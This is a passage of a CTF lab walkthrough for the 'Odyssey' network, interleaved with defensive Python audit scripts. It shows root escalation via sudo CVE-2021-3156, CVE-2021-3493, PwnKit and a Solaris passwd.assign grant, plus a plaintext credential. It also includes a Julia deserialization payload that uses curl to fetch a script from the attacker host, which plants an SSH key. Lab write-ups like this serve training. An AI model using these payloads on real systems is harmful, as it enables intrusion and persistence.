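        key, sep, value = line.partition(":")
        if sep:
            current[key.strip().lower()] = value.strip()
    if current:
        messages.append(current)
    return messages


def app_name(app_field: str) -> str:
    """Normalise 'System(id)', 'System,id' or 'System' to 'system'."""
    return re.split(r"[(,]", app_field, maxsplit=1)[0].strip().lower()


def redact(msg: dict) -> dict:
    """Copy of a message with the login secret masked, for safe logging."""
    return {k: ("***" if k == "secret" else v) for k, v in msg.items()}


def audit_ami(messages):
    """Return (message index, reason) for every message that injects shell execution."""
    findings = []
    for i, msg in enumerate(messages):
        action = msg.get("action", "").lower()
        if action == "command":
            m = ADD_EXT_RE.match(msg.get("command", ""))
            if m and app_name(m.group("app")) in SHELL_APPS:
                findings.append((i, f"CLI adds {m.group('exten')}@{m.group('context')} "
                                    f"with shell app {app_name(m.group('app'))}"))
        elif action == "originate" and msg.get("application", "").lower() in SHELL_APPS:
            findings.append((i, f"Originate runs shell app {msg['application']}"))
    return findings


if __name__ == "__main__":
    msgs = parse_ami(SAMPLE_SESSION)
    for idx, reason in audit_ami(msgs):
        print(f"message {idx} {redact(msgs[idx])}: {reason}")
```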
Can you see a singularity?
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
Looking at the sudo version we find 1.8.31, which is somewhat old.
asterisk@odyssey:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
asterisk@odyssey:~$
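Whether a given sudo build falls into the CVE-2021-3156 range can be checked from the output above. The following Python check is an added example, not part of the original writeup: it parses sudo --version output (a constructed copy of the one shown) against the upstream affected ranges, and interprets the non-destructive sudoedit -s / probe, which matters because distributions backport the fix without changing the upstream version string.

```python
import re

VERSION_RE = re.compile(r"Sudo version\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.I)

# Affected ranges from the CVE-2021-3156 advisory: legacy 1.8.2 through 1.8.31p2 and
# stable 1.9.0 through 1.9.5p1; the fix shipped in 1.9.5p2. Tuples are
# (major, minor, patch, p-level), with p-level 0 when there is no "pN" suffix.
AFFECTED_RANGES = [((1, 8, 2, 0), (1, 8, 31, 2)), ((1, 9, 0, 0), (1, 9, 5, 1))]

# Constructed copy of the "sudo --version" output seen on odyssey above.
SAMPLE_OUTPUT = """\
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
"""


def parse_sudo_version(output: str):
    """Extract (major, minor, patch, plevel) from 'sudo --version' output, or None."""
    m = VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected_version(version) -> bool:
    """Upstream version check only: distributions backport the fix without bumping
    the upstream version, so a hit here must be confirmed with the sudoedit probe."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_probe(output: str) -> str:
    """Interpret the output of 'sudoedit -s /' run as an unprivileged user: a
    vulnerable sudo complains that / is not a regular file, a patched one prints usage."""
    text = output.strip().lower()
    if "not a regular file" in text:
        return "vulnerable"
    if text.startswith("usage:"):
        return "patched"
    return "unknown"


if __name__ == "__main__":
    version = parse_sudo_version(SAMPLE_OUTPUT)
    print(version, "in affected range" if is_affected_version(version) else "not in range")
```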
Searching for exploits we find CVE-2021-3156, which affects this version; we copy a public
exploit, run it and get a shell as root.
asterisk@odyssey:~$ python3 exploit_nss.py
# whoami
root
# hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
# cat /root/flag.txt
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
#
Zero Entropy
ODYSSEY{JUL14_d353R14L124710n}
In /opt we find the Gogs repositories of elpenor, including a second one called apikey_beta.git
besides the rocketchat_bot one we already saw; we copy it to a directory under /tmp as .git.
root@odyssey:/opt/git/gogs-repositories/elpenor# ls -l
drwxr-xr-x 7 asterisk root 4096 Mar 25 2021 apikey_beta.git
drwxr-xr-x 7 asterisk root 4096 Feb 28 2021 rocketchat_bot.git
root@odyssey:/opt/git/gogs-repositories/elpenor# mkdir /tmp/otros
root@odyssey:/opt/git/gogs-repositories/elpenor# cp -r apikey_beta.git /tmp/otros/.git
root@odyssey:/opt/git/gogs-repositories/elpenor#
If we run git status it complains that it must be run in a work tree; after unsetting the bare
configuration we can run it again and see the status.
root@odyssey:/tmp/otros# git status
fatal: this operation must be run in a work tree
root@odyssey:/tmp/otros# git config --unset core.bare
root@odyssey:/tmp/otros# git status
On branch master
Changes to be committed:
(use "git restore --staged ..." to unstage)
deleted: README.md
deleted: genie.service
deleted: run.ji
root@odyssey:/opt/git/gogs-repositories/elpenor#
There are 3 deleted files, which we can restore using git reset --hard.
root@odyssey:/tmp/otros# git reset --hard
HEAD is now at 0512c32 Update 'README.md'
root@odyssey:/tmp/otros# ls -l
-rw-r--r-- 1 root root 170 Aug 30 04:02 genie.service
-rw-r--r-- 1 root root 311 Aug 30 04:02 README.md
-rw-r--r-- 1 root root 627 Aug 30 04:02 run.ji
root@odyssey:/tmp/otros#
Let's start with genie.service, a systemd unit that simply runs the run.ji file with julia as
the user elpenor.
root@odyssey:/tmp/otros# cat genie.service
[Unit]
Description= Julia API
After=network.target
[Service]
Type=simple
User=elpenor
ExecStart=/usr/bin/julia /opt/beta_api/run.ji
[Install]
WantedBy=multi-user.target
root@odyssey:/tmp/otros#
run.ji is simple: it defines a Genie web app whose /key route receives a parameter f by POST,
base64-decodes it, writes it to /tmp/f.txt and deserializes that file.
root@odyssey:/tmp/otros# cat run.ji
using Genie
using Genie.Router, Genie.Renderer, Genie.Renderer.Html, Genie.Renderer.Json, Genie.Requests, Base64, Serialization

route("/") do
    return "Key API"
end

route("/key", method = POST) do
    data = postpayload(:f)
    io = IOBuffer()
    iob64_decode = Base64DecodePipe(io)
    write(io, data)
    seekstart(io)
    new_data = String(read(iob64_decode))
    con = isfile("/tmp/f.txt")
    if con == true
        rm("/tmp/f.txt")
    else
        "N"
    end
    open("/tmp/f.txt", "w") do io
        write(io, new_data)
    end;
    # the request body is deserialized without any validation
    Serialization.deserialize("/tmp/f.txt");
end

up(3000, "0.0.0.0", async=false)
root@odyssey:/tmp/otros#
Searching for Julia vulnerabilities we find a deserialization attack; we take its PoC and use
it to simply execute the id command.

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`id`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>
Once created, we send it to .11, where the script we saw runs on port 3000; as parameter f we
send the file base64-encoded, as the code expects, and as a result the id command runs as
elpenor.

❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"


uid=1000(elpenor) gid=1000(elpenor) groups=1000(elpenor)
To get a proper shell, on .12 we create an index.html containing the commands that add our
SSH public key to elpenor's authorized_keys, and serve it with Python's http.server on port 80.
root@odyssey:~# cat index.html
mkdir /home/elpenor/.ssh
echo "ssh-ed25519
AAAAC3NzaC1lZDI1NTE5AAAAIOChqNfHuH3wAgahGKW0RarFeScPycw5i9gJsIjvDWWS
kali@kali" >> /home/elpenor/.ssh/authorized_keys
root@odyssey:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now we create a Julia payload that fetches that page from the HTTP server with curl and saves
it as /tmp/shell, and we send it.

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`curl 192.168.21.12 -o /tmp/shell`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>

❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"

We then see a request on our server, which means the file was downloaded.


root@odyssey:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.21.11 - - "GET / HTTP/1.1" 200 -
Finally we create a payload that runs /tmp/shell with bash and send it; when it is
deserialized, our SSH key is added to authorized_keys.

❯ ./julia
_
_ _ _(_)_ | Documentation: https://docs.julialang.org
(_) | (_) (_) |
_ _ _| |_ __ _ | Type "?" for help, "]?" for Pkg help.
| | | | | | |/ _` | |
| | |_| | | | (_| | | Version 1.1.1 (2019-05-16)
_/ |\__'_|_|_|\__'_| | Official https://julialang.org/ release
|__/ |
julia> using Serialization
julia> Serialization.deserialize(s::Serializer, t::Type{BigInt})=run(`bash /tmp/shell`);
julia> filt=filter(methods(Serialization.deserialize).ms) do m String(m.file)[1]=='R' end;
julia> Serialization.serialize("poc.serialized_jl", (filt[1], BigInt(7)));
julia>
❯ curl 192.168.21.11:3000/key -d "f=$(base64 -w0 poc.serialized_jl)"

Now that our key is authorized, we can connect via SSH as elpenor without even providing a
password.

❯ ssh [email protected]
elpenor@dev01:~$ id
uid=1000(elpenor) gid=1000(elpenor) groups=1000(elpenor)
elpenor@dev01:~$ hostname -I
192.168.21.11 172.17.0.1
elpenor@dev01:~$ cat flag.txt
ODYSSEY{JUL14_d353R14L124710n}
elpenor@dev01:~$
Quantum foam
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}
Looking at the Linux version we are on, we find Ubuntu 20.04 LTS, which is vulnerable to
CVE-2021-3493, a privilege-escalation bug in the Linux kernel.
elpenor@dev01:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
elpenor@dev01:~$
Taking advantage of the fact that the machine has gcc, we compile the exploit and run it. It
gives us a bash shell as root, where we read the flag.
elpenor@dev01:~$ gcc exploit.c -o exploit
elpenor@dev01:~$ ./exploit
bash-5.0# whoami
root
bash-5.0# hostname -I
192.168.21.11 172.17.0.1
bash-5.0# cat /root/flag.txt
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}
bash-5.0#
Planck Length
ODYSSEY{50LaR15_R8AC_ADM1n15tRAT10n}
In the /root directory of dev01 we find a directory called Solaris, which has a file called
login.json containing what look like credentials.
root@dev01:~/Solaris# cat login.json
{
"username": "elpenor",
"password": "enRH+/<r5y48@yJ",
"scheme": "pam",
"preserve": true,
"timeout": -1
}
root@dev01:~/Solaris#
Trying the credentials against the SSH service of .13, the last machine we have left, we get a
shell as the user elpenor.

❯ ssh [email protected]
([email protected]) Password: enRH+/<r5y48@yJ
elpenor@dev:~$ id
uid=100(elpenor) gid=10(staff)
elpenor@dev:~$
Solaris has the auths command, which lists the authorizations a user has; curiously, our
current user has solaris.passwd.assign.
elpenor@dev:~$ auths
solaris.account.activate,solaris.admin.wusb.read,solaris.mail.mailq,solaris.network.autoconf.read,solaris.passwd.assign
elpenor@dev:~$
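An administrator reviewing this box would want to know which accounts hold solaris.passwd.assign before an attacker does. The following Python audit is an added example, not part of the original writeup or of Solaris: it parses a constructed /etc/user_attr excerpt (user:qualifier:res1:res2:attr, with auths=... inside attr) and the auths command output shown above, honouring wildcard grants such as solaris.*; authorizations granted indirectly through profiles (prof_attr) or policy.conf defaults are outside its scope.

```python
import fnmatch

# Authorizations worth flagging on non-root accounts; solaris.passwd.assign is the
# one elpenor holds above and lets its holder set any user's password.
SENSITIVE_AUTHS = ("solaris.passwd.assign",)

# Constructed /etc/user_attr excerpt: user:qualifier:res1:res2:attr, attr is key=value;...
SAMPLE_USER_ATTR = """\
# /etc/user_attr
root::::auths=solaris.*;profiles=All;lock_after_retries=no
elpenor::::auths=solaris.account.activate,solaris.admin.wusb.read,solaris.mail.mailq,solaris.network.autoconf.read,solaris.passwd.assign;profiles=Basic Solaris User
jdoe::::profiles=Basic Solaris User
"""


def parse_user_attr(text: str):
    """Map user -> set of auths granted directly in user_attr (not via profiles)."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":", 4)
        if len(fields) < 5:
            continue
        attrs = dict(kv.split("=", 1) for kv in fields[4].split(";") if "=" in kv)
        users[fields[0]] = {a.strip() for a in attrs.get("auths", "").split(",") if a.strip()}
    return users


def parse_auths_output(text: str):
    """Parse the comma-separated output of the auths command, even when the terminal
    wrapped it across lines (as in the listing above)."""
    return {a for a in "".join(text.split()).split(",") if a}


def auth_granted(granted, wanted: str) -> bool:
    """True if any granted auth covers 'wanted'; wildcard grants like solaris.* count."""
    return any(fnmatch.fnmatchcase(wanted, g) for g in granted)


def audit_user_attr(text: str, ignore=("root",)):
    """Return (user, auth) for every non-ignored user holding a sensitive authorization."""
    findings = []
    for user, auths in parse_user_attr(text).items():
        if user in ignore:
            continue
        for wanted in SENSITIVE_AUTHS:
            if auth_granted(auths, wanted):
                findings.append((user, wanted))
    return findings


if __name__ == "__main__":
    for user, auth in audit_user_attr(SAMPLE_USER_ATTR):
        print(f"{user} holds {auth}")
```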
This authorization allows us to change the password of any user, such as root.
elpenor@dev:~$ passwd root
New Password: password123#
Re-enter new Password: password123#
passwd: password successfully changed for root
elpenor@dev:~$
After changing root's password we only have to run su, provide the password, and we become
root; we can now read the last flag.
elpenor@dev:~$ su root
Password: password123#
root@dev:~# id
uid=0(root) gid=0(root)
root@dev:~# cat /root/flag.txt
ODYSSEY{50LaR15_R8AC_ADM1n15tRAT10n}
root@dev:~#
Extra
CVE-2021-4034 - root odyssey / root dev01
Alternatively, if we search the first machine for SUID binaries we see the by now famous
pkexec; with a PwnKit exploit we become root.
asterisk@odyssey:~$ find / -perm -u+s 2>/dev/null | grep -v snap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/pkexec
/usr/bin/at
asterisk@odyssey:~$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
asterisk@odyssey:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# hostname -I
192.168.21.12 172.17.0.1 10.1.148.128
# cat /root/flag.txt
ODYSSEY{W3_4LL_4r3_p4r7_Of_4_cluS73R}
#
Exactly the same works on the dev01 machine, which also has pkexec with the SUID bit set.
elpenor@dev01:~$ find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/mount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
elpenor@dev01:~$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
elpenor@dev01:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# hostname -I
192.168.21.11 172.17.0.1
# cat /root/flag.txt
ODYSSEY{74k3_c4R3_0f_Y0uR_R4nCH}
